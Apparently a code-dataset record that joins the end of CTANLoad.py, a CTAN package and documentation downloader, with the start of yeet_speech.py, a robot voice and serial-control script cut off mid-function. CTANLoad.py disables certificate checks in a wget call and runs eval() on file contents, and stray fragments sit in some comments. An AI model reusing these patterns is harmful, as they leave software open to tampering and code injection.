# call_load --> set_PDF_toc
# call_load --> Load_XML_files
# call_load --> generate_pickle2
global PDF_toc
global XML_toc
global authors
global licenses
global packages
global topics
global topicspackage, number, counter, pdfcounter
get_PDF_files(direc)
load_XML_toc()
set_PDF_toc()
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
all_packages = set() # initialize set
for f in packages:
all_packages.add(f) # construct a set object (packages has not the right format)
tmp_tp = all_packages.copy() # initialize tmp_tp
tmp_ap = all_packages.copy() # initialize tmp_ap
tmp_np = all_packages.copy() # initialize tmp_np
if (template != template_default):
tmp_np = get_package_set() # analyze 'packages' for name templates
if (key_template != key_template_default):
tmp_tp = get_CTAN_lpt() # load CTAN.lpt and analyze it for key templates
if (author_template != author_template_default):
tmp_ap = get_CTAN_lap() # load CTAN.lap and analyze it for author templates
tmp_pp = tmp_tp & tmp_ap & tmp_np
if len(tmp_pp) == 0:
if verbose:
print("--- Warning: no correct XML file for any specified package found")
tmp_p = sorted(tmp_pp) # built an intersection
dload_XML_files(tmp_p) # load and processe all required XML files in series
thr1 = Thread(target=generate_pickle2) # dump XML_toc via pickle file via thread
thr1.start()
thr1.join()
generate_topicspackage() # generates topicspackage, ...
thr2 = Thread(target=generate_pickle1) # dump some lists to pickle file
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def call_plain(): # Function call_plain: Process all steps for a plain call.
"""Process all steps for a plain call."""
# call_plain --> get_PDF_files
# call_plain --> dload_topics
# call_plain --> dload_authors
# call_plain --> dload_licenses
# call_plain --> dload_packages
# call_plain --> genea´rate_Topicspackage
# call_plain --> generate_pickle1
global PDF_toc
global authors
global licenses
global packages
global topics
global topicspackage, packagetopics, authorpackages
get_PDF_files(direc)
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
generate_topicspackage() # generate topicspackage, ...
thr3 = Thread(target=generate_pickle1) # dump authors, packages, topics, licenses, topicspackage, packagetopics (via thread)
thr3.start()
thr3.join()
# ------------------------------------------------------------------
def check_integrity(always=False): # Function check_integrity(): Check integrity.
"""Check integrity."""
# check_integrity --> generate_pickle2
# check_integrity --> verify_PDF_files
global corrected # number of corrections
global PDF_toc # PDF_toc, structure: PDF_toc[file] = fkey + "-" + onename
global noerror
global ok
if verbose:
print("--- Info: integrity check")
load_XML_toc() # load the 2nd pickle file (XML_toc)
# XML_toc, structure: XML_toc[href] = (file, fkey, onename)
noerror = True
tmpdict = {} # for a copy of XML_toc
for f in XML_toc: # make a copy of XML_toc
tmpdict[f] = XML_toc[f]
# ..................................................................
for f in tmpdict: # loop: all entries in a copy of XML_toc
tmp = tmpdict[f]
xlfn = direc + tmp[0] # local file name for current XML file
plfn = direc + tmp[1] + "-" + tmp[2] # local file name for current PDF file
xex = os.path.isfile(xlfn) # test: XLM file exists
pex = os.path.isfile(plfn) # test: PDF file exists
if xex: # XLM file exists
if os.path.getsize(xlfn) == 0: # but file is empty
if verbose:
print("----- Warning: entry '{0}' in dictionary, but OS file is empty".format(xlfn))
os.remove(xlfn) # OS file removed
if verbose:
print("----- Warning: XML file '{0}' in OS deleted".format(xlfn))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(xlfn))
noerror = False # flag set
corrected += 1 # number of corrections increasedtuda-ci.xml
else: # XML file not empty
if os.path.isfile(plfn): # test: PDF file exists
if os.path.getsize(plfn) != 0:
PDF_toc[tmp[1] + "-" + tmp[2]] = tmp[0] # generate entry in PDF_toc
else:
if verbose:
print("----- Warning: entry '{0}' ({1}) in dictionary, but OS file is empty".format(plfn, tmp[0]))
os.remove(plfn) # OS file removed
if verbose:
print("----- Warning: PDF file '{0}' in OS deleted".format(plfn))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(plfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
else:
if verbose:
print("----- Warning: entry '{0}' ({1}) in dictionary, but PDF file not found".format(plfn, tmp[0]))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(plfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
else: # XML file does not exist
print("----- Warning: entry '{0}' in dictionary, but OS file not found".format(xlfn))
del XML_toc[f] # entry deleted
print("----- Warning: entry '{0}' in dictionary deleted".format(xlfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
thr5 = Thread(target=verify_PDF_files) # check actualized PDF_toc; delete a PDF file if necessary
thr5.start()
thr5.join()
# ..................................................................
if noerror and ok and (not always): # there is no error
if verbose:
print("----- Info: no error with integrity check")
else:
thr2 = Thread(target=generate_pickle2) # generate a new version of the 2nd pickle file (via thread)
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def dload_authors(): # Function dload_authors(): Download XML file 'authors' from CTAN and generate dictionary 'authors'.
"""Download XML file 'authors'zztex.xml from CTAN and generate dictionary 'authors'."""
global authors # global Python dictionary with authors
file = "authors" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # load file 'authors'
# wget https://ctan.org/xml/2.0/authors?no-dtd=true --no-check-certificate -O ./authors.xml
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
authorsTree = ET.parse(file2) # parse the XML file 'authors.xml'
authorsRoot = authorsTree.getroot() # get the root
for child in authorsRoot: # all children
key = "" # defaults
id = ""
fname = ""
gname = ""
for attr in child.attrib: # three attributes: id, givenname, familyname
if str(attr) == "id":
key = child.attrib['id'] # attribute id
if str(attr) == "givenname":
gname = child.attrib['givenname'] # attribute givenname
if str(attr) == "familyname":
fname = child.attrib['familyname'] # attribute familyname
authors[key] = (gname, fname)
if verbose:
print("----- Info: authors collected")
except: # parsing was not successfull
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file2))
sys.exit("- Error: programm terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: programm terminated") # program terminated
# ------------------------------------------------------------------
def dload_document_file(href, key, name): # Function dload_document_file(href, key, name): Download one information file (PDF) from CTAN.
"""Download one information file (PDF) from CTAN."""
# to be improved
global pdfcounter
global pdfctrerr
call = "wget " + href + parameter + direc + key + "-" + name
noterror = False
# @wait: 17.5.3 in library
try: # download the PDF file and store
process = subprocess.Popen(call, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outs, errs = process.communicate(timeout=50) # wait?
if "ERROR" in errs: # "ERROR" found in errs
if verbose:
print("------- Warning: PDF documentation file '{0}' not downloaded".format(name))
pdfctrerr = pdfctrerr + 1
else:
if verbose:
print("------- Info: PDF documentation file '{0}' downloaded".format(name))
print("------- Info: unique local file name: '{0}'".format(direc + key + "-" + name))
pdfcounter = pdfcounter + 1 # number of downloaded PDF files incremented
noterror = True
except: # download was not successfull
process.kill() # kill the process
outs, errs = process.communicate() # output and error messages
if verbose:
print("------- Warning: PDF documentation file '{0}' not downloaded".format(name))
return noterror
# ------------------------------------------------------------------
def dload_licenses(): # Function dload_licenses: Download XML file 'licenses' from CTAN and generate dictionary 'licemses'.
"""Download XML file 'licenses' from CTAN and generate dictionary 'licemses'."""
global licenses # global Python dictionary with licenses
file = "licenses" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../licenses
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
licensesTree = ET.parse(file2) # parse the XML file 'topics.xml'
licensesRoot = licensesTree.getroot() # get the root
for child in licensesRoot: # all children in 'licenses'
key = "" # defaults
name = ""
free = ""
for attr in child.attrib: # three attributes: key, name, free
if str(attr) == "key":
key = child.attrib['key'] # attribute key
if str(attr) == "name":
name = child.attrib['name'] # attribute name
if str(attr) == "free":
free = child.attrib['free'] # attribute free
licenses[key] = name
licenses["noinfo"] = "No Information" # correction; not in lincenses.xml
licenses["collection"] = "Collection" # correction; not in lincenses.xml
licenses["digest"] = "Digest" # correction; not in lincenses.xml
if verbose:
print("----- Info: licenses collected")
except: # parsing was not successfull
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file))
sys.exit("--- Error: programm terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: programm terminated") # program terminated
# ------------------------------------------------------------------
def dload_packages(): # Function dload_packages: Download XML file 'packages' from CTAN and generate dictionary 'packages'.
"""Download XML file 'packages' from CTAN and generate dictionary 'packages'."""
global packages # global Python dictionary with packages
file = "packages" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../packages
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try: # parses 'packages' tree
packagesTree = ET.parse(file2) # parse the XML file 'packages.xml'
packagesRoot = packagesTree.getroot() # get the root
for child in packagesRoot: # all children in 'packages'
key = "" # defaults
name = ""
caption = ""
for attr in child.attrib: # three attributes: key, name, caption
if str(attr) == "key":
key = child.attrib['key'] # attribute key
if str(attr) == "name":
name = child.attrib['name'] # attribute name
if str(attr) == "caption":
caption = child.attrib['caption'] # attribute caption
packages[key] = (name, caption)
if verbose:
print("----- Info: packages collected")
except: # parsing was not successfull
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file2))
sys.exit("--- Error: programm terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '" + file + "' not downloaded".format(file))
sys.exit("- Error: programm terminated") # program terminated
# ------------------------------------------------------------------
def dload_topics(): # Function dload_topics(): Download XML file 'topics' from CTANB and generate dictionary 'topics'.
"""Download XML file 'topics' from CTAN and generate dictionary 'topics'."""
global topics # global Python dictionary with topics
file = "topics" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../topics
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
topicsTree = ET.parse(file2) # parse the XML file 'topics.xml'
topicsRoot = topicsTree.getroot() # get the root
for child in topicsRoot: # all children in 'topics'
key = "" # defaults
name = ""
details = ""
for attr in child.attrib: # two attributes: name, details
if str(attr) == "name":
key = child.attrib['name'] # attribute name
if str(attr) == "details":
details = child.attrib['details'] # attribute details
topics[key] = details
if verbose:
print("----- Info: topics collected")
except: # parsing was not successfull
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file))
sys.exit("--- Error: programm terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: '{0}' not downloaded".format(file))
sys.exit("- Error: programm terminated") # program terminated
# ------------------------------------------------------------------
def dload_XML_files(p): # Function dload_XML_files: Download XML package files.
"""Download XML package files.
p: packages/selected_packages"""
# dload_XML_file --> analyze_XML_file
global topicspackage, number, counter, pdfcounter
for f in p: # all packages found in 'packages'
if p2.match(f) and (counter + pdfcounter < number): # file name matches template
counter = counter + 1
callx = call2 + f + parameter + direc + f + ext # wget https://ctan.org/xml/2.0/pkg/xyz --no-check-certificate -O xyz.xml
try: # try to download the XML file (packages)
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait ?
if verbose:
print("----- Info: XML file for package '{0}' downloaded ('{1}.xml' on PC)".format(f, direc + f))
analyze_XML_file(f + ext) # if download is set: analyze the associated XML file
except FileNotFoundError: # download was not successfull
if verbose:
print("----- Warning: XML file for package '{0}' not downloaded".format(f))
if counter + pdfcounter >= number: # limit for downloaded files
if verbose:
print("--- Warning: maximum number ({0}) of downloaded XML+PDF files exceeded".format(str(counter + pdfcounter)))
# ------------------------------------------------------------------
def generate_lists(): # Function generate_lists: Generate some special files (with lists).:
# xyz.loa (list of authors), xyz.lop (list of packages), xyz.lok (list of topics),
# xyz.lpt (list of topics and associated packages)
"""Generate some special files (with lists).:
xyz.loa (list of authors)
xyz.lop (list of packages)
xyz.lok (list of topics)
xyz.lpt (list of topics and associated packages)
xyz.lap (list of authors and associated packages)
xyz is the specified generic output file name."""
# .................................................
# generate xyz.loa file (list of authors)
loa_file = output_name + ".loa"
loa = open(loa_file, encoding="utf-8", mode="w") # open xyz.loa file
for f in authors: # loop
loa.write(str(authors[f]) + "\n")
if verbose:
print("--- Info: file '" + loa_file + "' (list of authors) generated")
loa.close() # close xyz.loa file
# .................................................
# generate xyz.lop file (list of packages)
lop_file = output_name + ".lop"
lop = open(lop_file, encoding="utf-8", mode="w") # open xyz.lop file
for f in packages: # loop
lop.write(str(packages[f]) + "\n")
if verbose:
print("--- Info: file '" + lop_file + "' (list of packages) generated")
lop.close() # close xyz.lop file
# .................................................
# generate xyz.lok file (list of topics)
lok_file = output_name + ".lok"
lok = open(lok_file, encoding="utf-8", mode="w") # open xyz.lok file
for f in topics: # loop
lok.write("('" + f + "', '" + str(topics[f]) + "')\n")
if verbose:
print("--- Info: file '" + lok_file + "' (list of topics) generated")
lok.close() # close xyz.lok file
# .................................................
# generate xyz.lol file (list of licenses)
lol_file = output_name + ".lol"
lol = open(lol_file, encoding="utf-8", mode="w") # open xyz.lol file
for f in licenses: # loop
lol.write("('" + f + "', '" + str(licenses[f]) + "')\n")
if verbose:
print("--- Info: file '" + lol_file + "' (list of licenses) generated")
lol.close() # close xyz.lol file
# .................................................
# generate xyz.lpt file (list of topics and associated packages)
lpt_file = output_name + ".lpt"
lpt = open(lpt_file, encoding="utf-8", mode="w") # open xyz.lpt file
for f in topicspackage: # loop
lpt.write("('" + f + "', " + str(topicspackage[f]) + ")\n")
if verbose:
print("--- Info: file '" + lpt_file + "' (list of topics and associated packages) generated")
lpt.close() # close xyz.lpt file
# .................................................
# generate xyz.lap file (list of authors and associated packages)
lap_file = output_name + ".lap"
lap = open(lap_file, encoding="utf-8", mode="w") # open xyz.lap file
for f in authorpackages: # loop
lap.write("('" + str(f) + "', " + str(authorpackages[f]) + ")\n")
if verbose:
print("--- Info: file '" + lap_file + "' (list of authors and associated packages) generated")
lap.close() # close xyz.lap file
# ------------------------------------------------------------------
def generate_pickle1(): # Function generate_pickle1: pickle dump: actual authors, packages, licenses, topics, topicspackage, packagetopics
"""pickle dump:
actual authors, packages, licenses, topics, topicspackage, packagetopics"""
# authors: Python dictionary (sorted)
# each element: [author key] <tuple with givenname and familyname>
#
# packages: Python dictionary (sorted)
# each element: [package key] <tuple with package name and package title>
#
# licenses: Python dictionary (sorted)
# each element: [license key] <license title>
#
# topics: Python dictionary (sorted)
# each element: [topics name] <topics title>
#
# topicspackage: Python dictionary (unsorted)
# each element: [topic key] <list with package names>
#
# packagetopics: Python dictionary (sorted)
# each element: [topic key] <list with package names>
#
# authorpackages: Python dictionary (unsorted)
# each element: [author key] <list with package names>
pickle_name1 = direc + pkl_file # path of the pickle file
pickle_file1 = open(pickle_name1, "bw") # open the pickle file
pickle_data1 = (authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages)
pickle.dump(pickle_data1, pickle_file1) # dump the data
pickle_file1.close() # close the file
if verbose:
print("--- Info: pickle file '{0}' written".format(pickle_name1))
# ------------------------------------------------------------------
def generate_pickle2(): # Function generate_pickle2: pickle dump: actual XML_toc (list with download information files.
"""pickle dump:
needs actual XML_toc
XML_toc : list with download information files"""
pickle_name2 = direc + pkl_file2
try:
pickle_file2 = open(pickle_name2, "bw") # open the 2nd .pkl file
pickle_data2 = XML_toc # prepare the data
pickle.dump(pickle_data2, pickle_file2) # dump the data
pickle_file2.close() # close the file
if verbose:
print("--- Info: pickle file '{0}' written".format(pickle_name2))
except: # not successfull
if verbose:
print("--- Warning: pickle file '{0}' cannot be loaded a/o written".format(pickle_name2))
# ------------------------------------------------------------------
def generate_topicspackage(): # Function generate_topicspackage(): Generate topicspackage, packagetopics, and authorpackages.
"""Generate topicspackage, packagetopics, and authorpackages."""
global topicspackage, packagetopics, authorpackages
for f in packages: # all package XML files are loaded in series
try: # try to open and parse file
fext = f + ext # file name (with extension)
ff = open(fext, encoding="utf-8", mode="r")
try:
onePackage = ET.parse(fext) # parse the XML file
onePackageRoot = onePackage.getroot() # get root
ll = list(onePackageRoot.iter("keyval")) # all keyval elements
aa = list(onePackageRoot.iter("authorref")) # all authorref elements
for i in ll: # in keyval: 1 attribute: value
key = i.get("value", "") # attribute value
if key in topicspackage:
topicspackage[key].append(f)
else:
topicspackage[key] = [f]
if f in packagetopics:
packagetopics[f].append(key)
else:
packagetopics[f] = [key]
for j in aa: # in authorref: 4 attributes: givenname, familyname, key, id
key1 = j.get("givenname", "") # attribute givenname
key2 = j.get("familyname", "") # attribute familyname
key3 = j.get("key", "") # attribute key
key4 = j.get("id", "") # attribute id
if key4 != "":
key3 = key4
if key3 in authorpackages:
authorpackages[key3].append(f)
else:
authorpackages[key3] = [f]
except: # parsing was not successfull
if verbose:
print("----- Warning: local XML file for package '{0}' empty or not well-formed".format(f))
ff.close()
except FileNotFoundError: # file not downloaded
if verbose and integrity:
print("----- Warning: local XML file for package '" + f + "' not found".format(f))
if verbose:
print("--- Info: packagetopics, topicspackage, authorpackage collected")
# ------------------------------------------------------------------
def get_CTAN_lpt(): # function get_CTAN_lpt: Download and analyze CTAN.lpt for topic templates
"""Download and analyze CTAN.lpt for topic templates."""
global number, counter, pdfcounter
try:
f = open(topicpackage_file, encoding="utf-8", mode="r") # open file
for line in f:
top, pack=eval(line.strip())
if p5.match(top): # collect packages with specified topics
for g in pack:
selected_packages_lpt.add(g)
f.close() # close file
except IOError:
if verbose: # there is an error
print("- Error: local file '{0}' not loaded".format(topicpackage_file))
sys.exit() # program terminates
if len(selected_packages_lpt) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("topic", key_template))
return selected_packages_lpt
# ------------------------------------------------------------------
def get_CTAN_lap(): # function get_CTAN_lap: Download and analyze CTAN.lap for author templates
"""Download and analyze CTAN.lap for author templates."""
global number, counter, pdfcounter
try:
f = open(authorpackage_file, encoding="utf-8", mode="r") # open file
for line in f:
auth, pack=eval(line.strip()) # get the items author and package
if authors[auth][1] != "": # extract author's familyname
auth2 = authors[auth][1]
else:
auth2 = authors[auth][0]
if p6.match(auth2): # collect packages with specified authors
for g in pack:
selected_packages_lap.add(g)
f.close() # close file
except IOError:
if verbose: # there is an error
print("- Error: local file '{0}' not loaded".format(authorpackage_file))
sys.exit() # program terminates
if len(selected_packages_lap) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("author", author_template))
return selected_packages_lap
# ------------------------------------------------------------------
def get_package_set(): # Function get_package_set: Analyze dictionary 'packages' for name templates.
"""Analyze dictionary 'packages' for name templates."""
tmp = set()
for f in packages:
if p2.match(f):
tmp.add(f)
if len(tmp) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("name", template))
return tmp
# ------------------------------------------------------------------
def get_PDF_files(d): # Function get_PDF_files(d): List all PDF files in a specified OS directory.
"""List all PDF files in the specified OS directory d.
d: directory"""
global PDF_toc
tmp = os.listdir(d) # get OS directory list
tmp2 = {}
for f in tmp: # all PDF files in current OS directory
if p3.match(f): # check: file name matches p3
tmp2[f] = "" # presets with empty string
PDF_toc = tmp2
# ------------------------------------------------------------------
def get_XML_files(d): # Function get_XML_files(d)
"""List all XML files in the OS directory d"""
tmp = os.listdir(d) # get OS directory list
tmp2 = []
for f in tmp:
if p4.match(f) and not f in exclusion:
tmp2.append(f)
return tmp2
# ------------------------------------------------------------------
def load_XML_toc(): # Function load_XML_toc(): Load pickle file 2 (which contains XML_toc).
"""Load pickle file 2 (which contains XML_toc)."""
global XML_toc # global Python dictionary
try:
pickleFile2 = open(direc + pkl_file2, "br") # open the pickle file
XML_toc = pickle.load(pickleFile2) # unpickle the data
pickleFile2.close()
except IOError: # not successfull
pass # do nothing
# ------------------------------------------------------------------
def main(): # Function main(): Main Function
"""Main Function"""
# main --> call_plain
# main --> call_check
# main --> call_load
# main --> make_statistics
global PDF_toc
global download
global lists
global integrity
global number
global template
global author_template
global regenerate
starttotal = time.time() # begin of time measure
startprocess= time.process_time()
reset_text = "- Warning: '{0}' reset to {1} (due to {2})"
load = (template != template_default) or (key_template != key_template_default) or (author_template != author_template_default) # load
check = (not load) and ((lists != lists_default) or (integrity != integrity_default)) # check
newpickle = (not load) and (not check) and (regenerate != regenerate_default) # newpickle
plain = (not load) and (not check) and (not newpickle) # plain
if verbose:
print("- Info: program call:", call)
if load: # load mode
if (lists != lists_default): # -l reset
lists = False
if verbose:
print(reset_text.format("-l",False,"'-n' or '-t' or '-f'"))
if (integrity != integrity_default): # -c reset
integrity = False
if verbose:
print(reset_text.format("-c",False,"'-n' or '-t' or '-f'"))
if (regenerate != regenerate_default): # -r reset
regenerate = False
if verbose:
print(reset_text.format("-r", False, "'-n' or '-t' or '-f'"))
if check: # check mode
if (regenerate != regenerate_default): # -r reset
regenerate = False
if verbose:
print(reset_text.format("-r", False, "'-l' or '-c'"))
if newpickle: # newpickle mode
if number == number_default:
number = 3000 # -n reset
if verbose:
print(reset_text.format("-n", 3000, "'-r'"))
if download == download_default:
download = True # -f reset
if verbose:
print(reset_text.format("-f", True, "'-r'"))
if verbose: # output on terminal (options in call)
print("\n- Info: program call (with more details): CTANLoad.py")
if (download != download_default): print(" {0:5} {1:55}".format("-f", "(" + download_text + ")"))
if (lists != lists_default): print(" {0:5} {1:55}".format("-l", "(" + (lists_text + ")")[0:50] + ellipse))
if (regenerate != regenerate_default): print(" {0:5} {1:55}".format("-r", "(" + regenerate_text + ")"))
if (statistics != statistics_default): print(" {0:5} {1:55}".format("-stat", "(" + statistics_text + ")"))
if (integrity != integrity_default): print(" {0:5} {1:55}".format("-c", "(" + integrity_text + ")"))
if (verbose != verbose_default): print(" {0:5} {1:55}".format("-v", "(" + verbose_text + ")"))
if (direc != direc_default): print(" {0:5} {2:55} {1}".format("-d", direc, "(" + direc_text + ")"))
if (number != number_default): print(" {0:5} {2:55} {1}".format("-n", number, "(" + number_text + ")"))
if (output_name != direc + output_name_default): print(" {0:5} {2:55} {1}".format("-o", args.output_name, "(" + output_text + ")"))
if (template != template_default): print(" {0:5} {2:55} {1}".format("-t", fold(template), "(" + template_text + ")"))
if (key_template != key_template_default): print(" {0:5} {2:55} {1}".format("-k", fold(key_template), "(" + key_template_text + ")"))
if (author_template != author_template_default): print(" {0:5} {2:55} {1}".format("-A", fold(author_template), "(" + author_template_text + ")"))
print("\n")
if plain: # Process all steps for a plain call.
call_plain()
elif load: # Process all steps for a complete ctanout call (withoutb integrity check).
call_load()
elif check: # Process all necessary steps for a integrity check.
call_check()
elif newpickle: # Regenerate the two pickle files.
regenerate_pickle_files()
check_integrity(always=True)
else:
pass
if verbose:
print("- Info: program successfully completed")
if statistics: # if statistics are to be output
make_statistics()
endtotal = time.time() # end of time measure
endprocess = time.process_time()
print("--")
print("total time: ".ljust(left + 1), round(endtotal-starttotal, rndg))
print("process time: ".ljust(left + 1), round(endprocess-startprocess, rndg))
# ------------------------------------------------------------------
def make_statistics(): # Function make_statistics(): Print statistics on terminal.
"""Print statistics on terminal."""
global counter, pdfcounter
l = left
r = 5
load = (template != "")
nrXMLfile = 0
XMLdir = os.listdir(direc)
for f in XMLdir:
if p4.match(f):
nrXMLfile += 1
print("\nStatistics\n")
print("total number of authors on CTAN:".ljust(l), str(len(authors)).rjust(r))
print("total number of topics on CTAN:".ljust(l), str(len(topics)).rjust(r))
print("total number of packages on CTAN:".ljust(l), str(len(packages)).rjust(r))
if download:
print("number of downloaded XML files:".ljust(l), str(counter).rjust(r), "(in the actual session)")
print("number of downloaded PDF files:".ljust(l), str(pdfcounter).rjust(r), "(in the actual session)")
print("number of not downloaded PDF files:".ljust(l), str(pdfctrerr).rjust(r), "(in the actual session)")
print("total number of local PDF files:".ljust(l), str(len(PDF_toc)).rjust(r))
print("total number of local XML files:".ljust(l), str(nrXMLfile).rjust(r))
if integrity:
print("number of corrected entries:".ljust(l), str(corrected).rjust(r), "(in the actual session)")
# ------------------------------------------------------------------
def regenerate_pickle_files():
"""Regenerate corrupted pickle files."""
global XML_toc, PDF_toc
global authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
# generate_pickle_files --> get_PDF_files
# generate_pickle_files --> dload_authors
# generate_pickle_files --> dload_packages
# generate_pickle_files --> dload_topics
# generate_pickle_files --> dload_licenses
# generate_pickle_files --> generate_topicspackage
# generate_pickle_files --> analyze_XML_file
# generate_pickle_files --> generate_pickle2
# generate_pickle_files --> generate_pickle1
# .................................................................
# Regeneration of CTAN2.pkl
# CTAN2.pkl needs XML_toc
if verbose:
print("--- Info: Regeneration of '{0}'".format(direc + pkl_file2))
get_PDF_files(direc)
dload_authors() # load authors
dload_packages() # load packages
dload_topics() # load topics
dload_licenses() # load licenses
generate_topicspackage() # generate topicspackage, packagetopics, authorpackages
for f in get_XML_files(direc):
if verbose:
print("----- Info: local XML file '{0}'".format(direc + f))
analyze_XML_file(f)
thr1 = Thread(target=generate_pickle2) # dump XML_toc info CTAN2.pkl
thr1.start()
thr1.join()
# .................................................................
# Regeneration of CTAN1.pkl
# CTAN2.pkl needs authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
if verbose:
print("--- Info: Regeneration of '{0}'".format(direc + pkl_file))
thr2 = Thread(target=generate_pickle1) # dump authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages into CTAN1.pkl
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def set_PDF_toc(): # set_PDF_toc: Fill PDF_toc on the basis of XML_Toc.
"""Fill PDF_toc on the basis of XML_toc."""
global PDF_toc
global XML_toc
for f in XML_toc:
(xlfn, fkey, plfn) = XML_toc[f]
if os.path.exists(direc + xlfn) and os.path.exists(direc + fkey + "-" + plfn):
PDF_toc[fkey + "-" + plfn] = xlfn
else:
pass
# ------------------------------------------------------------------
def verify_PDF_files(): # Function verify_PDF_files: check actualized PDF_toc; delete a PDF file if necessary
"""Check actualized PDF_toc; delete a PDF file if necessary."""
global ok
global PDF_toc
global corrected
ok = True
for g in PDF_toc: # loop: move through PDF files
if PDF_toc[g] == "": # no entry: no ass. XML file
ok = False
if verbose:
print("----- Warning: PDF file '{0}' without associated XML file".format(g))
if os.path.isfile(g): # g is file
os.remove(g) # delete the PDF file (if it exists)
corrected += 1 # number of corrections increased
if verbose:
print("----- Warning: PDF file '{0}' in OS deleted".format(g))
else:
pass
# ==================================================================
# Main part
# script --> main
if __name__ == "__main__":
main()
else:
if verbose:
print("- Error: tried to use the program indirectly")
|
yeet_speech.py
|
#!/usr/bin/env python
import sys
sys.path.append("./snowboy/examples/Python/")
import snowboydecoder_arecord as snowboydecoder
import subprocess
import signal
import io
#import sys
import os
import serial
import multiprocessing
import time
import math
import json
import numpy as np
from ctypes import c_bool
from decimal import Decimal as D
from google.cloud import speech
from google.cloud import texttospeech
from google.cloud.speech import enums
from google.cloud.speech import types
ANGLE_ELEMENT_NUM = 10
IDLE = 0
RECEIVING_REQUEST = 1
RECEIVING_TOOL_EARLY = 2
RECEIVING_TOOL_ON_TIME = 3
RECEIVING_TOOL_LATE = 4
GIVING_TOOL = 5
TRAVELLING = 6
snowboy = None
def init():
global computer
global buffer_lock
global read_buffer
global port
global doa_matrix
global doa_odas
global snowboy_lock
global request_needed
global manager
global state
global inventory
global ros_buffer
global request_text
global wakeword_process
subprocess.call(["killall", "odaslive"])
#subprocess.call(["killall", "matrix-odas"])
computer = serial.Serial(
port = '/dev/mbed',
baudrate=115200,
timeout=0.3)
#computer.write("pi speech alive")
#done = 0
#while not done:
# cmd = computer.read_until(">yeet<")
# if cmd == ">yeet<":
# done = 1
computer.write(">yeet<")
#initialise ros variables
manager = multiprocessing.Manager()
state = multiprocessing.Value('i', IDLE)
inventory = manager.list()
ros_buffer = multiprocessing.Queue()
buffer_lock = multiprocessing.Lock()
#start doa
doa_process = multiprocessing.Process(target=listen_matrix)
doa_process.start()
#initialise thread for listening to computer and reading buffer and wakeword
port = multiprocessing.Process(target=listen_serial, args=(ros_buffer,))
port.start()
read_buffer = multiprocessing.Process(target=read_ros_buffer, args=(ros_buffer,))
read_buffer.start()
#start wake word detection
request_needed = multiprocessing.Value(c_bool, False)
snowboy_lock = multiprocessing.Lock()
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
#start_wake_word()
tts("yeetbot 3000, online")
def listen_serial(queue):
while True:
cmd = ''
time.sleep(0.1)
try:
cmd = computer.read_until("<")
if cmd:
with buffer_lock:
queue.put(cmd)
if queue.qsize() > 2:
queue.get()
except:
time.sleep(0.1)
def listen_matrix():
global computer
os.chdir("/home/pi/yeetbot/yeetbot_natural_language/pi_speech/odas/bin/")
doa_matrix = subprocess.Popen(["./matrix-odas"], stdout=subprocess.PIPE)
doa_odas = subprocess.Popen(["./odaslive", "-c", "../config/matrix-demo/matrix_voice.cfg"])
os.chdir("/home/pi/yeetbot/yeetbot_natural_language/pi_speech/")
offset=4
while True:
output = doa_matrix.stdout.readline()
offset += 1
if offset == 9:
output = json.loads(output[:-2])
angle = np.arctan2(output.get('x'), output.get('y'))
serial_angle = ">a/" + str(angle) + "<"
computer.write(serial_angle)
offset -= 9
def wakeword_detected():
global request_needed
global snowboy
global computer
print("wakeword detected")
